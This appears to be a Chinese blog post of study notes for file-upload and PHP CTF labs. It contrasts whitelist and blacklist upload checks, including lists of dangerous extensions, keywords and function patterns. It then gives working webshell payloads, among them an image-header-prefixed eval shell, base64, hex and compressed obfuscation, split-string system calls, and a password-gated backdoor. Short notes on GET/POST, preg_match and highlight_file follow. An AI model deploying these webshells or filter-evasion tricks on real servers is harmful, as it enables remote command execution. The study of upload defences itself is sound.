news 2026/4/18 13:21:39

文件上传靶场的3种白名单,3种黑名单,以及3种针对文件内容的修改。特性靶场、get,post传参方式区别(抓包看看),正则匹配,以及高亮函数作用

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
文件上传靶场的3种白名单,3种黑名单,以及3种针对文件内容的修改。特性靶场、get,post传参方式区别(抓包看看),正则匹配,以及高亮函数作用

上传靶场:

一、文件上传三种白名单验证

1 .扩展名白名单

// 只允许特定的安全扩展名 $allowed_ext = ['.jpg', '.png', '.gif', '.pdf', '.doc']; $ext = strtolower(strrchr($filename, '.')); if(!in_array($ext, $allowed_ext)) { die("文件类型不允许"); }

特点:最安全的验证方式,只允许已知安全的扩展名。

2.MIME类型白名单

// 只允许特定的Content-Type $allowed_mime = [ 'image/jpeg', 'image/png', 'image/gif', 'application/pdf' ]; $file_mime = $_FILES['file']['type']; if(!in_array($file_mime, $allowed_mime)) { die("文件MIME类型不允许"); } ​

特点:基于HTTP头的Content-Type验证,但容易被伪造。

3.文件内容头白名单

// 检查文件魔术字节(文件头) $allowed_magic = [ "\xFF\xD8\xFF", // JPEG "\x89PNG\r\n\x1A\n", // PNG "GIF89a", // GIF "%PDF" // PDF ]; $file_header = file_get_contents($tmp_file, false, null, 0, 8); $valid = false; foreach($allowed_magic as $magic) { if(strpos($file_header, $magic) === 0) { $valid = true; break; } } if(!$valid) die("文件内容类型不允许");

特点:最可靠的验证方式,检查文件的实际内容特征。

二、文件上传三种黑名单验证

1.扩展名黑名单

php

// 禁止危险扩展名 $deny_ext = ['.php', '.php5', '.php4', '.php3', '.phtml', '.phar', '.asp', '.aspx', '.jsp', '.jspx', '.pl', '.py', '.sh']; $ext = strtolower(strrchr($filename, '.')); if(in_array($ext, $deny_ext)) { die("危险文件类型禁止上传"); }

特点:不安全,容易被未列出的扩展名绕过(如.php6、.php7等)。

2.危险关键词黑名单

php

// 禁止文件名包含危险关键词 $dangerous_keywords = ['shell', 'webshell', 'backdoor', 'cmd', 'exec', 'eval', 'system', 'passthru', 'phpinfo']; $filename_lower = strtolower($filename); foreach($dangerous_keywords as $keyword) { if(strpos($filename_lower, $keyword) !== false) { die("文件名包含危险关键词"); } }

特点:容易被大小写、编码、拆分等方式绕过。

3.文件内容黑名单

php

// 扫描文件内容是否包含危险代码 $dangerous_patterns = [ '/<\?php/i', '/eval\s*\(/i', '/system\s*\(/i', '/shell_exec\s*\(/i', '/passthru\s*\(/i', '/proc_open\s*\(/i', '/popen\s*\(/i' ]; $file_content = file_get_contents($tmp_file); foreach($dangerous_patterns as $pattern) { if(preg_match($pattern, $file_content)) { die("文件内容包含危险代码"); } }

特点:可能被编码、混淆、分块等方式绕过。

三、三种针对文件内容的修改绕过技术

1.添加合法文件头绕过

php

// 在Webshell前添加图片头 GIF89a; // 或 JPEG、PNG头 <?php @eval($_POST['cmd']); ?>

原理:让文件同时具有合法图片特征和恶意代码。

2.编码混淆绕过

php

<?php // Base64编码绕过 eval(base64_decode('c3lzdGVtKCRfR0VUWydjbWQnXSk7')); // 等同于:system($_GET['cmd']); ​ // 十六进制编码 eval(pack('H*','73797374656d28245f4745545b27636d64275d293b')); ​ // 多级编码 eval(gzuncompress(base64_decode('eJxLzClJLVKwVQAAOQAF'))); ?>

原理:将恶意代码编码,避免直接匹配关键词。

3.字符串拆分与拼接绕过

php

<?php // 敏感函数拆分 $a = 'sys'.'tem'; $b = 'who'.'ami'; $a($b); ​ // 使用变量函数 $func = 'ph'.'pinfo'; $func(); ​ // 数组方式 $arr = array('s','y','s','t','e','m'); $func = implode('', $arr); $func('id'); ​ // 通过常量定义 define('CMD', 's'.'y'.'s'.'t'.'e'.'m'); CMD('whoami'); ?>

原理:将敏感字符串拆分成无害部分,运行时再组合。

四、补充:高级绕过技术

1.条件执行绕过

php

<?php // 只在特定条件下执行 if(isset($_GET['key']) && $_GET['key'] == 'secret123') { @eval($_POST['cmd']); } else { echo "正常图片内容"; } ?>

2.注释符混淆

php

<?php // 利用注释干扰检测 /*<?php */eval/*注释*/($_POST/*注释*/['cmd'])/*注释*/;//*/ ?> ?>

3.多语言标签混淆

php

<?php // 使用短标签 <?=system($_GET['cmd'])?> ​ // ASP风格标签(如果服务器支持) <% eval request("cmd") %> ​ // Script标签 <script language="php">system($_GET['cmd']);</script> ?>

特性靶场:

一、GET和POST传参方式区别

  • GET:参数通过URL传递,格式为?key1=value1&key2=value2

  • POST:参数通过请求体传递,不在URL中显示

抓包对比

GET请求示例:
GET /target.php?v1=1&v2=var_dump&v3=%29%3B%20var_dump%28%24ctfshow%29%3B%20%2F%2F%20%3A HTTP/1.1 Host: example.com User-Agent: ...

如web89

POST请求示例:
POST /target.php HTTP/1.1 Host: example.com Content-Type: application/x-www-form-urlencoded Content-Length: 15 ​ v1=1&v2=var_dump

如web97

二、正则匹配(preg_match

基本语法

php

preg_match(pattern, subject)

在题目中的应用

1. 检查是否包含冒号

php

preg_match("/\:/", $v2)
  • 模式:/\:/

  • 含义:匹配冒号字符:

  • 作用:检查$v2中是否包含冒号

2. 检查是否不包含冒号

php

!preg_match("/\:/", $v2)
  • 取反,检查$v2中是否不包含冒号

3. 常用正则模式
  • /[0-9]/- 匹配数字

  • /[a-z]/i- 匹配字母(不区分大小写)

  • /\./- 匹配点号

  • /\;/- 匹配分号

正则转义说明

  • \:中的反斜杠是转义字符

  • 因为:在正则中有特殊含义(如?:非捕获组)

  • 但单独:不需要转义,写/:也可以

三、高亮函数(highlight_file

基本功能

php

highlight_file(__FILE__);

php

show_source(__FILE__); // 别名

作用

  1. 语法高亮:将PHP代码以HTML格式输出

  2. 颜色标记

    • 关键字(如if,echo):通常为蓝色

    • 字符串:通常为红色

    • 注释:通常为绿色

    • 变量:通常为黑色

  3. 便于阅读:帮助开发者/攻击者理解代码结构

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/4/18 8:26:29

windows操作系统的基本命令

一.信息收集1.系统信息systeminfo(查看系统详细信息)hostname 主机名whoami /priv 当前用户权限set 查看环境变量wmic qfe get Caption,Description,HotFixID,Installedon #补丁信息2.网络信息ipconfig /all 网络配置arp -a arp缓存表netstat -ano 活动连接与进程pidroute prin…

作者头像 李华
网站建设 2026/4/18 7:04:45

飞桨PaddlePaddle 3.1自动并行技术解析

飞桨PaddlePaddle 3.1自动并行技术解析 在千亿参数模型成为常态的今天&#xff0c;训练一个大模型早已不再是“多加几张卡”就能解决的问题。显存不够、通信拖慢、调优耗时——这些挑战让分布式训练成了少数专家手中的“黑魔法”。而飞桨PaddlePaddle 3.1带来的自动并行技术&am…

作者头像 李华
网站建设 2026/4/18 7:42:40

Dify部署实战:基于Docker Compose一键启动AI应用开发环境

Dify部署实战&#xff1a;基于Docker Compose一键启动AI应用开发环境 在企业加速拥抱大模型的今天&#xff0c;一个常见的现实是&#xff1a;算法团队花了几周时间用LangChain搭起的RAG系统&#xff0c;在交付给产品部门时却因为“看不懂代码”而难以持续迭代。这种割裂让很多A…

作者头像 李华
网站建设 2026/4/18 7:00:53

调节性 T 细胞(Tregs)科普

调节性 T 细胞调节性 T 细胞&#xff08;简称 Tregs&#xff09;是免疫系统中负责调控功能的 T 细胞亚群&#xff0c;核心作用是维持免疫平衡&#xff0c;其功能异常与自身免疫病、肿瘤、感染等多种疾病密切相关&#xff0c;是近年免疫领域的研究热点。​一、Tregs 的定义与核心…

作者头像 李华
网站建设 2026/4/18 6:57:47

FaceFusion错误:代理环境下localhost无法访问

FaceFusion错误&#xff1a;代理环境下localhost无法访问 ValueError: When localhost is not accessible, a shareable link must be created. Please set shareTrue or check your proxy settings to allow access to localhost如果你在使用 FaceFusion 的 Docker 镜像时&…

作者头像 李华
网站建设 2026/4/18 6:59:39

Seed-Coder-8B-Base实战:构建机器学习Pipeline

Seed-Coder-8B-Base实战&#xff1a;构建机器学习Pipeline 在当今AI驱动的软件工程浪潮中&#xff0c;开发者正从“手动编码者”逐步转型为“系统设计者”。我们不再满足于逐行敲出样板代码&#xff0c;而是期望用意图表达来驱动开发流程——尤其是在复杂度高、模式化的机器学…

作者头像 李华